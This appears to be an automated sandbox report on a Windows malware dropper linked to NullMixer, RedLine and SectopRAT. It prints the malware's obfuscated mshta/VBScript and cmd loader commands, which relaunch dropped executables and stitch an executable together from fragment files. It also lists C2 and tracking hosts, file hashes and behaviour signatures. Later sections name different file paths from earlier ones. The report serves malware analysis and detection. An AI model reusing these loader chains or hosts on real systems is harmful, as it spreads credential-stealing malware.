C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 272
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 440
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| N/A | 127.0.0.1:49275 | tcp | |
| N/A | 127.0.0.1:49277 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:23325 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FR | 91.121.67.60:23325 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | c93901703b1d556d494f7a31ffb04720 |
| SHA1 | d14e2dc239ac85e6020f1fc4c035f7d2ea72d262 |
| SHA256 | 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631 |
| SHA512 | 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2796-76-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
memory/3000-127-0x0000000000400000-0x000000000089B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
memory/2620-164-0x00000000021B0000-0x00000000022FC000-memory.dmp
memory/556-165-0x0000000002540000-0x0000000002742000-memory.dmp
memory/2780-178-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-176-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-175-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-174-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2780-172-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-170-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-168-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2780-166-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2796-179-0x0000000000400000-0x000000000051B000-memory.dmp
memory/2796-187-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2796-186-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2796-185-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2796-183-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2796-180-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2620-188-0x0000000002E40000-0x0000000002EE5000-memory.dmp
memory/2620-192-0x0000000002EF0000-0x0000000002F82000-memory.dmp
memory/2620-189-0x0000000002EF0000-0x0000000002F82000-memory.dmp
memory/556-193-0x0000000002CF0000-0x0000000002D95000-memory.dmp
memory/556-197-0x0000000002DA0000-0x0000000002E32000-memory.dmp
memory/556-194-0x0000000002DA0000-0x0000000002E32000-memory.dmp
memory/2944-129-0x00000000003C0000-0x00000000003C6000-memory.dmp
memory/344-128-0x0000000001360000-0x00000000013C8000-memory.dmp
memory/2824-198-0x0000000000400000-0x0000000000883000-memory.dmp
memory/556-200-0x0000000002540000-0x0000000002742000-memory.dmp
memory/2620-199-0x00000000021B0000-0x00000000022FC000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/2944-115-0x0000000001220000-0x000000000123A000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NVX9Z8PTS0WU4CI6G0TB.temp
| MD5 | e1fe0785abfdaf20ec9f62376f97c2a3 |
| SHA1 | b01626c55df5f089fc64b30e383f3b90a22d345d |
| SHA256 | 8c5508a1706c3350159b72bd67e400b16fda92a40fc72ac86a27602adede39f7 |
| SHA512 | a2da6235209820148667b37564a16ad23ff22acd586d51c9512346fa9f6a5f9d1a6d9ace350b3c73021f2886c7745d26670eadd84b24276c90cbaba898355b68 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
memory/2796-77-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2796-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2796-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2796-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2796-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2796-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2796-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2796-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2796-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2796-60-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2796-57-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/556-206-0x0000000002DA0000-0x0000000002E32000-memory.dmp
memory/2620-209-0x0000000002EF0000-0x0000000002F82000-memory.dmp
memory/2620-210-0x0000000002F90000-0x0000000003CD1000-memory.dmp
memory/2620-211-0x00000000008F0000-0x000000000097B000-memory.dmp
memory/2620-212-0x0000000000D10000-0x0000000000D97000-memory.dmp
memory/2708-215-0x0000000002850000-0x000000000299C000-memory.dmp
memory/2708-217-0x0000000002850000-0x000000000299C000-memory.dmp
memory/2708-219-0x0000000002DF0000-0x0000000002E95000-memory.dmp
memory/2708-220-0x0000000002EA0000-0x0000000002F32000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2312 set thread context of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe |
| PID 1612 set thread context of 3068 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe |
| PID 1936 set thread context of 496 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
